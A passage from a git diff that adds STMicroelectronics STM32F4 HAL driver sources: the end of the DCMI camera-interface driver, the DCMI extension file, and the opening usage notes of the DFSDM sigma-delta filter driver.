HAL_DCMI_Resume(DCMI_HandleTypeDef* hdcmi) +{ + /* Process locked */ + __HAL_LOCK(hdcmi); + + if(hdcmi->State == HAL_DCMI_STATE_SUSPENDED) + { + /* Change DCMI state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Disable Capture */ + hdcmi->Instance->CR |= DCMI_CR_CAPTURE; + } + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Handles DCMI interrupt request. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for the DCMI. + * @retval None + */ +void HAL_DCMI_IRQHandler(DCMI_HandleTypeDef *hdcmi) +{ + uint32_t isr_value = READ_REG(hdcmi->Instance->MISR); + + /* Synchronization error interrupt management *******************************/ + if((isr_value & DCMI_FLAG_ERRRI) == DCMI_FLAG_ERRRI) + { + /* Clear the Synchronization error flag */ + __HAL_DCMI_CLEAR_FLAG(hdcmi, DCMI_FLAG_ERRRI); + + /* Update error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_SYNC; + + /* Change DCMI state */ + hdcmi->State = HAL_DCMI_STATE_ERROR; + + /* Set the synchronization error callback */ + hdcmi->DMA_Handle->XferAbortCallback = DCMI_DMAError; + + /* Abort the DMA Transfer */ + HAL_DMA_Abort_IT(hdcmi->DMA_Handle); + } + /* Overflow interrupt management ********************************************/ + if((isr_value & DCMI_FLAG_OVRRI) == DCMI_FLAG_OVRRI) + { + /* Clear the Overflow flag */ + __HAL_DCMI_CLEAR_FLAG(hdcmi, DCMI_FLAG_OVRRI); + + /* Update error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_OVR; + + /* Change DCMI state */ + hdcmi->State = HAL_DCMI_STATE_ERROR; + + /* Set the overflow callback */ + hdcmi->DMA_Handle->XferAbortCallback = DCMI_DMAError; + + /* Abort the DMA Transfer */ + HAL_DMA_Abort_IT(hdcmi->DMA_Handle); + } + /* Line Interrupt management ************************************************/ + if((isr_value & DCMI_FLAG_LINERI) == DCMI_FLAG_LINERI) + { + /* Clear the Line interrupt flag */ + __HAL_DCMI_CLEAR_FLAG(hdcmi, DCMI_FLAG_LINERI); + + /* Line interrupt Callback */ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + /*Call registered DCMI line event callback*/ + hdcmi->LineEventCallback(hdcmi); +#else + HAL_DCMI_LineEventCallback(hdcmi); +#endif /* USE_HAL_DCMI_REGISTER_CALLBACKS */ + } + /* VSYNC interrupt management ***********************************************/ + if((isr_value & DCMI_FLAG_VSYNCRI) == DCMI_FLAG_VSYNCRI) + { + /* Clear the VSYNC flag */ + __HAL_DCMI_CLEAR_FLAG(hdcmi, DCMI_FLAG_VSYNCRI); + + /* VSYNC Callback */ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + /*Call registered DCMI vsync event callback*/ + hdcmi->VsyncEventCallback(hdcmi); +#else + HAL_DCMI_VsyncEventCallback(hdcmi); +#endif /* USE_HAL_DCMI_REGISTER_CALLBACKS */ + } + /* FRAME interrupt management ***********************************************/ + if((isr_value & DCMI_FLAG_FRAMERI) == DCMI_FLAG_FRAMERI) + { + /* When snapshot mode, disable Vsync, Error and Overrun interrupts */ + if((hdcmi->Instance->CR & DCMI_CR_CM) == DCMI_MODE_SNAPSHOT) + { + /* Disable the Line, Vsync, Error and Overrun interrupts */ + __HAL_DCMI_DISABLE_IT(hdcmi, DCMI_IT_LINE | DCMI_IT_VSYNC | DCMI_IT_ERR | DCMI_IT_OVR); + } + + /* Disable the Frame interrupt */ + __HAL_DCMI_DISABLE_IT(hdcmi, DCMI_IT_FRAME); + + /* Frame Callback */ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + /*Call registered DCMI frame event callback*/ + hdcmi->FrameEventCallback(hdcmi); +#else + HAL_DCMI_FrameEventCallback(hdcmi); +#endif /* USE_HAL_DCMI_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Error DCMI callback. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval None + */ +__weak void HAL_DCMI_ErrorCallback(DCMI_HandleTypeDef *hdcmi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdcmi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DCMI_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief Line Event callback. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval None + */ +__weak void HAL_DCMI_LineEventCallback(DCMI_HandleTypeDef *hdcmi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdcmi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DCMI_LineEventCallback could be implemented in the user file + */ +} + +/** + * @brief VSYNC Event callback. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval None + */ +__weak void HAL_DCMI_VsyncEventCallback(DCMI_HandleTypeDef *hdcmi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdcmi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DCMI_VsyncEventCallback could be implemented in the user file + */ +} + +/** + * @brief Frame Event callback. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval None + */ +__weak void HAL_DCMI_FrameEventCallback(DCMI_HandleTypeDef *hdcmi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdcmi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DCMI_FrameEventCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup DCMI_Exported_Functions_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== +[..] This section provides functions allowing to: + (+) Configure the CROP feature. + (+) Enable/Disable the CROP feature. + +@endverbatim + * @{ + */ + +/** + * @brief Configure the DCMI CROP coordinate. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @param X0 DCMI window X offset + * @param Y0 DCMI window Y offset + * @param XSize DCMI Pixel per line + * @param YSize DCMI Line number + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_ConfigCrop(DCMI_HandleTypeDef *hdcmi, uint32_t X0, uint32_t Y0, uint32_t XSize, uint32_t YSize) +{ + /* Process Locked */ + __HAL_LOCK(hdcmi); + + /* Lock the DCMI peripheral state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Check the parameters */ + assert_param(IS_DCMI_WINDOW_COORDINATE(X0)); + assert_param(IS_DCMI_WINDOW_COORDINATE(YSize)); + assert_param(IS_DCMI_WINDOW_COORDINATE(XSize)); + assert_param(IS_DCMI_WINDOW_HEIGHT(Y0)); + + /* Configure CROP */ + hdcmi->Instance->CWSIZER = (XSize | (YSize << DCMI_POSITION_CWSIZE_VLINE)); + hdcmi->Instance->CWSTRTR = (X0 | (Y0 << DCMI_POSITION_CWSTRT_VST)); + + /* Initialize the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + return HAL_OK; +} + +/** + * @brief Disable the Crop feature. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_DisableCrop(DCMI_HandleTypeDef *hdcmi) +{ + /* Process Locked */ + __HAL_LOCK(hdcmi); + + /* Lock the DCMI peripheral state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Disable DCMI Crop feature */ + hdcmi->Instance->CR &= ~(uint32_t)DCMI_CR_CROP; + + /* Change the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + return HAL_OK; +} + +/** + * @brief Enable the Crop feature. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_EnableCrop(DCMI_HandleTypeDef *hdcmi) +{ + /* Process Locked */ + __HAL_LOCK(hdcmi); + + /* Lock the DCMI peripheral state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Enable DCMI Crop feature */ + hdcmi->Instance->CR |= (uint32_t)DCMI_CR_CROP; + + /* Change the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + return HAL_OK; +} + +/** + * @brief Set embedded synchronization delimiters unmasks. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @param SyncUnmask pointer to a DCMI_SyncUnmaskTypeDef structure that contains + * the embedded synchronization delimiters unmasks. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_ConfigSyncUnmask(DCMI_HandleTypeDef *hdcmi, DCMI_SyncUnmaskTypeDef *SyncUnmask) +{ + /* Process Locked */ + __HAL_LOCK(hdcmi); + + /* Lock the DCMI peripheral state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + + /* Write DCMI embedded synchronization unmask register */ + hdcmi->Instance->ESUR = (((uint32_t)SyncUnmask->FrameStartUnmask) |\ + ((uint32_t)SyncUnmask->LineStartUnmask << DCMI_ESUR_LSU_Pos)|\ + ((uint32_t)SyncUnmask->LineEndUnmask << DCMI_ESUR_LEU_Pos)|\ + ((uint32_t)SyncUnmask->FrameEndUnmask << DCMI_ESUR_FEU_Pos)); + + /* Change the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdcmi); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup DCMI_Exported_Functions_Group4 Peripheral State functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Check the DCMI state. + (+) Get the specific DCMI error flag. + +@endverbatim + * @{ + */ + +/** + * @brief Return the DCMI state + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL state + */ +HAL_DCMI_StateTypeDef HAL_DCMI_GetState(DCMI_HandleTypeDef *hdcmi) +{ + return hdcmi->State; +} + +/** + * @brief Return the DCMI error code + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval DCMI Error Code + */ +uint32_t HAL_DCMI_GetError(DCMI_HandleTypeDef *hdcmi) +{ + return hdcmi->ErrorCode; +} + +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) +/** + * @brief DCMI Callback registering + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @param CallbackID dcmi Callback ID + * @param pCallback pointer to DCMI_CallbackTypeDef structure + * @retval status + */ +HAL_StatusTypeDef HAL_DCMI_RegisterCallback(DCMI_HandleTypeDef *hdcmi, HAL_DCMI_CallbackIDTypeDef CallbackID, pDCMI_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* update the error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + else + { + if(hdcmi->State == HAL_DCMI_STATE_READY) + { + switch (CallbackID) + { + case HAL_DCMI_FRAME_EVENT_CB_ID : + hdcmi->FrameEventCallback = pCallback; + break; + + case HAL_DCMI_VSYNC_EVENT_CB_ID : + hdcmi->VsyncEventCallback = pCallback; + break; + + case HAL_DCMI_LINE_EVENT_CB_ID : + hdcmi->LineEventCallback = pCallback; + break; + + case HAL_DCMI_ERROR_CB_ID : + hdcmi->ErrorCallback = pCallback; + break; + + case HAL_DCMI_MSPINIT_CB_ID : + hdcmi->MspInitCallback = pCallback; + break; + + case HAL_DCMI_MSPDEINIT_CB_ID : + hdcmi->MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if(hdcmi->State == HAL_DCMI_STATE_RESET) + { + switch (CallbackID) + { + case HAL_DCMI_MSPINIT_CB_ID : + hdcmi->MspInitCallback = pCallback; + break; + + case HAL_DCMI_MSPDEINIT_CB_ID : + hdcmi->MspDeInitCallback = pCallback; + break; + + default : + /* update the error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update the error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + } + + return status; +} + +/** + * @brief DCMI Callback Unregistering + * @param hdcmi dcmi handle + * @param CallbackID dcmi Callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_DCMI_UnRegisterCallback(DCMI_HandleTypeDef *hdcmi, HAL_DCMI_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(hdcmi->State == HAL_DCMI_STATE_READY) + { + switch (CallbackID) + { + case HAL_DCMI_FRAME_EVENT_CB_ID : + hdcmi->FrameEventCallback = HAL_DCMI_FrameEventCallback; /* Legacy weak FrameEventCallback */ + break; + + case HAL_DCMI_VSYNC_EVENT_CB_ID : + hdcmi->VsyncEventCallback = HAL_DCMI_VsyncEventCallback; /* Legacy weak VsyncEventCallback */ + break; + + case HAL_DCMI_LINE_EVENT_CB_ID : + hdcmi->LineEventCallback = HAL_DCMI_LineEventCallback; /* Legacy weak LineEventCallback */ + break; + + case HAL_DCMI_ERROR_CB_ID : + hdcmi->ErrorCallback = HAL_DCMI_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_DCMI_MSPINIT_CB_ID : + hdcmi->MspInitCallback = HAL_DCMI_MspInit; + break; + + case HAL_DCMI_MSPDEINIT_CB_ID : + hdcmi->MspDeInitCallback = HAL_DCMI_MspDeInit; + break; + + default : + /* update the error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hdcmi->State == HAL_DCMI_STATE_RESET) + { + switch (CallbackID) + { + case HAL_DCMI_MSPINIT_CB_ID : + hdcmi->MspInitCallback = HAL_DCMI_MspInit; + break; + + case HAL_DCMI_MSPDEINIT_CB_ID : + hdcmi->MspDeInitCallback = HAL_DCMI_MspDeInit; + break; + + default : + /* update the error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update the error code */ + hdcmi->ErrorCode |= HAL_DCMI_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + return status; +} +#endif /* USE_HAL_DCMI_REGISTER_CALLBACKS */ + +/** + * @} + */ +/* Private functions ---------------------------------------------------------*/ +/** @defgroup DCMI_Private_Functions DCMI Private Functions + * @{ + */ + +/** + * @brief DMA conversion complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void DCMI_DMAXferCplt(DMA_HandleTypeDef *hdma) +{ + uint32_t tmp = 0U; + + DCMI_HandleTypeDef* hdcmi = ( DCMI_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + if(hdcmi->XferCount != 0U) + { + /* Update memory 0 address location */ + tmp = ((hdcmi->DMA_Handle->Instance->CR) & DMA_SxCR_CT); + if(((hdcmi->XferCount % 2U) == 0U) && (tmp != 0U)) + { + tmp = hdcmi->DMA_Handle->Instance->M0AR; + HAL_DMAEx_ChangeMemory(hdcmi->DMA_Handle, (tmp + (8U*hdcmi->XferSize)), MEMORY0); + hdcmi->XferCount--; + } + /* Update memory 1 address location */ + else if((hdcmi->DMA_Handle->Instance->CR & DMA_SxCR_CT) == 0U) + { + tmp = hdcmi->DMA_Handle->Instance->M1AR; + HAL_DMAEx_ChangeMemory(hdcmi->DMA_Handle, (tmp + (8U*hdcmi->XferSize)), MEMORY1); + hdcmi->XferCount--; + } + } + /* Update memory 0 address location */ + else if((hdcmi->DMA_Handle->Instance->CR & DMA_SxCR_CT) != 0U) + { + hdcmi->DMA_Handle->Instance->M0AR = hdcmi->pBuffPtr; + } + /* Update memory 1 address location */ + else if((hdcmi->DMA_Handle->Instance->CR & DMA_SxCR_CT) == 0U) + { + tmp = hdcmi->pBuffPtr; + hdcmi->DMA_Handle->Instance->M1AR = (tmp + (4U*hdcmi->XferSize)); + hdcmi->XferCount = hdcmi->XferTransferNumber; + } + + /* Check if the frame is transferred */ + if(hdcmi->XferCount == hdcmi->XferTransferNumber) + { + /* Enable the Frame interrupt */ + __HAL_DCMI_ENABLE_IT(hdcmi, DCMI_IT_FRAME); + + /* When snapshot mode, set dcmi state to ready */ + if((hdcmi->Instance->CR & DCMI_CR_CM) == DCMI_MODE_SNAPSHOT) + { + hdcmi->State= HAL_DCMI_STATE_READY; + } + } +} + +/** + * @brief DMA error callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void DCMI_DMAError(DMA_HandleTypeDef *hdma) +{ + DCMI_HandleTypeDef* hdcmi = ( DCMI_HandleTypeDef* )((DMA_HandleTypeDef* )hdma)->Parent; + + if(hdcmi->DMA_Handle->ErrorCode != HAL_DMA_ERROR_FE) + { + /* Initialize the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + } + + /* DCMI error Callback */ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + /*Call registered DCMI error callback*/ + hdcmi->ErrorCallback(hdcmi); +#else + HAL_DCMI_ErrorCallback(hdcmi); +#endif /* USE_HAL_DCMI_REGISTER_CALLBACKS */ + +} + +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F407xx || STM32F417xx || STM32F427xx || STM32F437xx ||\ + STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx ||\ + STM32F479xx */ +#endif /* HAL_DCMI_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dcmi_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dcmi_ex.c new file mode 100644 index 000000000..b21454c90 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dcmi_ex.c @@ -0,0 +1,185 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dcmi_ex.c + * @author MCD Application Team + * @brief DCMI Extension HAL module driver + * This file provides firmware functions to manage the following + * functionalities of DCMI extension peripheral: + * + Extension features functions + * + @verbatim + ============================================================================== + ##### DCMI peripheral extension features ##### + ============================================================================== + + [..] Comparing to other previous devices, the DCMI interface for STM32F446xx + devices contains the following additional features : + + (+) Support of Black and White cameras + + ##### How to use this driver ##### + ============================================================================== + [..] This driver provides functions to manage the Black and White feature + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ +/** @defgroup DCMIEx DCMIEx + * @brief DCMI Extended HAL module driver + * @{ + */ + +#ifdef HAL_DCMI_MODULE_ENABLED + +#if defined(STM32F407xx) || defined(STM32F417xx) || defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) ||\ + defined(STM32F439xx) || defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup DCMIEx_Exported_Functions DCMI Extended Exported Functions + * @{ + */ + +/** + * @} + */ + +/** @addtogroup DCMI_Exported_Functions_Group1 Initialization and Configuration functions + * @{ + */ + +/** + * @brief Initializes the DCMI according to the specified + * parameters in the DCMI_InitTypeDef and create the associated handle. + * @param hdcmi pointer to a DCMI_HandleTypeDef structure that contains + * the configuration information for DCMI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DCMI_Init(DCMI_HandleTypeDef *hdcmi) +{ + /* Check the DCMI peripheral state */ + if(hdcmi == NULL) + { + return HAL_ERROR; + } + + /* Check function parameters */ + assert_param(IS_DCMI_ALL_INSTANCE(hdcmi->Instance)); + assert_param(IS_DCMI_PCKPOLARITY(hdcmi->Init.PCKPolarity)); + assert_param(IS_DCMI_VSPOLARITY(hdcmi->Init.VSPolarity)); + assert_param(IS_DCMI_HSPOLARITY(hdcmi->Init.HSPolarity)); + assert_param(IS_DCMI_SYNCHRO(hdcmi->Init.SynchroMode)); + assert_param(IS_DCMI_CAPTURE_RATE(hdcmi->Init.CaptureRate)); + assert_param(IS_DCMI_EXTENDED_DATA(hdcmi->Init.ExtendedDataMode)); + assert_param(IS_DCMI_MODE_JPEG(hdcmi->Init.JPEGMode)); +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + assert_param(IS_DCMI_BYTE_SELECT_MODE(hdcmi->Init.ByteSelectMode)); + assert_param(IS_DCMI_BYTE_SELECT_START(hdcmi->Init.ByteSelectStart)); + assert_param(IS_DCMI_LINE_SELECT_MODE(hdcmi->Init.LineSelectMode)); + assert_param(IS_DCMI_LINE_SELECT_START(hdcmi->Init.LineSelectStart)); +#endif /* STM32F446xx || STM32F469xx || STM32F479xx */ + if(hdcmi->State == HAL_DCMI_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hdcmi->Lock = HAL_UNLOCKED; + /* Init the low level hardware */ + /* Init the DCMI Callback settings */ +#if (USE_HAL_DCMI_REGISTER_CALLBACKS == 1) + hdcmi->FrameEventCallback = HAL_DCMI_FrameEventCallback; /* Legacy weak FrameEventCallback */ + hdcmi->VsyncEventCallback = HAL_DCMI_VsyncEventCallback; /* Legacy weak VsyncEventCallback */ + hdcmi->LineEventCallback = HAL_DCMI_LineEventCallback; /* Legacy weak LineEventCallback */ + hdcmi->ErrorCallback = HAL_DCMI_ErrorCallback; /* Legacy weak ErrorCallback */ + + if(hdcmi->MspInitCallback == NULL) + { + /* Legacy weak MspInit Callback */ + hdcmi->MspInitCallback = HAL_DCMI_MspInit; + } + /* Initialize the low level hardware (MSP) */ + hdcmi->MspInitCallback(hdcmi); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_DCMI_MspInit(hdcmi); +#endif /* (USE_HAL_DCMI_REGISTER_CALLBACKS) */ + HAL_DCMI_MspInit(hdcmi); + } + + /* Change the DCMI state */ + hdcmi->State = HAL_DCMI_STATE_BUSY; + /* Configures the HS, VS, DE and PC polarity */ + hdcmi->Instance->CR &= ~(DCMI_CR_PCKPOL | DCMI_CR_HSPOL | DCMI_CR_VSPOL | DCMI_CR_EDM_0 |\ + DCMI_CR_EDM_1 | DCMI_CR_FCRC_0 | DCMI_CR_FCRC_1 | DCMI_CR_JPEG |\ + DCMI_CR_ESS +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + | DCMI_CR_BSM_0 | DCMI_CR_BSM_1 | DCMI_CR_OEBS |\ + DCMI_CR_LSM | DCMI_CR_OELS +#endif /* STM32F446xx || STM32F469xx || STM32F479xx */ + ); + hdcmi->Instance->CR |= (uint32_t)(hdcmi->Init.SynchroMode | hdcmi->Init.CaptureRate |\ + hdcmi->Init.VSPolarity | hdcmi->Init.HSPolarity |\ + hdcmi->Init.PCKPolarity | hdcmi->Init.ExtendedDataMode |\ + hdcmi->Init.JPEGMode +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + | hdcmi->Init.ByteSelectMode |\ + hdcmi->Init.ByteSelectStart | hdcmi->Init.LineSelectMode |\ + hdcmi->Init.LineSelectStart +#endif /* STM32F446xx || STM32F469xx || STM32F479xx */ + ); + if(hdcmi->Init.SynchroMode == DCMI_SYNCHRO_EMBEDDED) + { + hdcmi->Instance->ESCR = (((uint32_t)hdcmi->Init.SyncroCode.FrameStartCode) | + ((uint32_t)hdcmi->Init.SyncroCode.LineStartCode << DCMI_POSITION_ESCR_LSC)| + ((uint32_t)hdcmi->Init.SyncroCode.LineEndCode << DCMI_POSITION_ESCR_LEC) | + ((uint32_t)hdcmi->Init.SyncroCode.FrameEndCode << DCMI_POSITION_ESCR_FEC)); + + } + + /* Enable the Line, Vsync, Error and Overrun interrupts */ + __HAL_DCMI_ENABLE_IT(hdcmi, DCMI_IT_LINE | DCMI_IT_VSYNC | DCMI_IT_ERR | DCMI_IT_OVR); + + /* Update error code */ + hdcmi->ErrorCode = HAL_DCMI_ERROR_NONE; + + /* Initialize the DCMI state*/ + hdcmi->State = HAL_DCMI_STATE_READY; + + return HAL_OK; +} + +/** + * @} + */ +#endif /* STM32F407xx || STM32F417xx || STM32F427xx || STM32F437xx || STM32F429xx ||\ + STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx */ +#endif /* HAL_DCMI_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dfsdm.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dfsdm.c new file mode 100644 index 000000000..c57ebebf7 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dfsdm.c @@ -0,0 +1,4425 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dfsdm.c + * @author MCD Application Team + * @brief This file provides firmware functions to manage the following + * functionalities of the Digital Filter for Sigma-Delta Modulators + * (DFSDM) peripherals: + * + Initialization and configuration of channels and filters + * + Regular channels configuration + * + Injected channels configuration + * + Regular/Injected Channels DMA Configuration + * + Interrupts and flags management + * + Analog watchdog feature + * + Short-circuit detector feature + * + Extremes detector feature + * + Clock absence detector feature + * + Break generation on analog watchdog or short-circuit event + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + *** Channel initialization *** + ============================== + [..] + (#) User has first to initialize channels (before filters initialization). + (#) As prerequisite, fill in the HAL_DFSDM_ChannelMspInit() : + (++) Enable DFSDMz clock interface with __HAL_RCC_DFSDMz_CLK_ENABLE(). + (++) Enable the clocks for the DFSDMz GPIOS with __HAL_RCC_GPIOx_CLK_ENABLE(). + (++) Configure these DFSDMz pins in alternate mode using HAL_GPIO_Init(). + (++) If interrupt mode is used, enable and configure DFSDMz_FLT0 global + interrupt with HAL_NVIC_SetPriority() and HAL_NVIC_EnableIRQ(). + (#) Configure the output clock, input, serial interface, analog watchdog, + offset and data right bit shift parameters for this channel using the + HAL_DFSDM_ChannelInit() function. + + *** Channel clock absence detector *** + ====================================== + [..] + (#) Start clock absence detector using HAL_DFSDM_ChannelCkabStart() or + HAL_DFSDM_ChannelCkabStart_IT(). + (#) In polling mode, use HAL_DFSDM_ChannelPollForCkab() to detect the clock + absence. + (#) In interrupt mode, HAL_DFSDM_ChannelCkabCallback() will be called if + clock absence is detected. + (#) Stop clock absence detector using HAL_DFSDM_ChannelCkabStop() or + HAL_DFSDM_ChannelCkabStop_IT(). + (#) Please note that the same mode (polling or interrupt) has to be used + for all channels because the channels are sharing the same interrupt. + (#) Please note also that in interrupt mode, if clock absence detector is + stopped for one channel, interrupt will be disabled for all channels. + + *** Channel short circuit detector *** + ====================================== + [..] + (#) Start short circuit detector using HAL_DFSDM_ChannelScdStart() or + or HAL_DFSDM_ChannelScdStart_IT(). + (#) In polling mode, use HAL_DFSDM_ChannelPollForScd() to detect short + circuit. + (#) In interrupt mode, HAL_DFSDM_ChannelScdCallback() will be called if + short circuit is detected. + (#) Stop short circuit detector using HAL_DFSDM_ChannelScdStop() or + or HAL_DFSDM_ChannelScdStop_IT(). + (#) Please note that the same mode (polling or interrupt) has to be used + for all channels because the channels are sharing the same interrupt. + (#) Please note also that in interrupt mode, if short circuit detector is + stopped for one channel, interrupt will be disabled for all channels. + + *** Channel analog watchdog value *** + ===================================== + [..] + (#) Get analog watchdog filter value of a channel using + HAL_DFSDM_ChannelGetAwdValue(). + + *** Channel offset value *** + ===================================== + [..] + (#) Modify offset value of a channel using HAL_DFSDM_ChannelModifyOffset(). + + *** Filter initialization *** + ============================= + [..] + (#) After channel initialization, user has to init filters. + (#) As prerequisite, fill in the HAL_DFSDM_FilterMspInit() : + (++) If interrupt mode is used , enable and configure DFSDMz_FLTx global + interrupt with HAL_NVIC_SetPriority() and HAL_NVIC_EnableIRQ(). + Please note that DFSDMz_FLT0 global interrupt could be already + enabled if interrupt is used for channel. + (++) If DMA mode is used, configure DMA with HAL_DMA_Init() and link it + with DFSDMz filter handle using __HAL_LINKDMA(). + (#) Configure the regular conversion, injected conversion and filter + parameters for this filter using the HAL_DFSDM_FilterInit() function. + + *** Filter regular channel conversion *** + ========================================= + [..] + (#) Select regular channel and enable/disable continuous mode using + HAL_DFSDM_FilterConfigRegChannel(). + (#) Start regular conversion using HAL_DFSDM_FilterRegularStart(), + HAL_DFSDM_FilterRegularStart_IT(), HAL_DFSDM_FilterRegularStart_DMA() or + HAL_DFSDM_FilterRegularMsbStart_DMA(). + (#) In polling mode, use 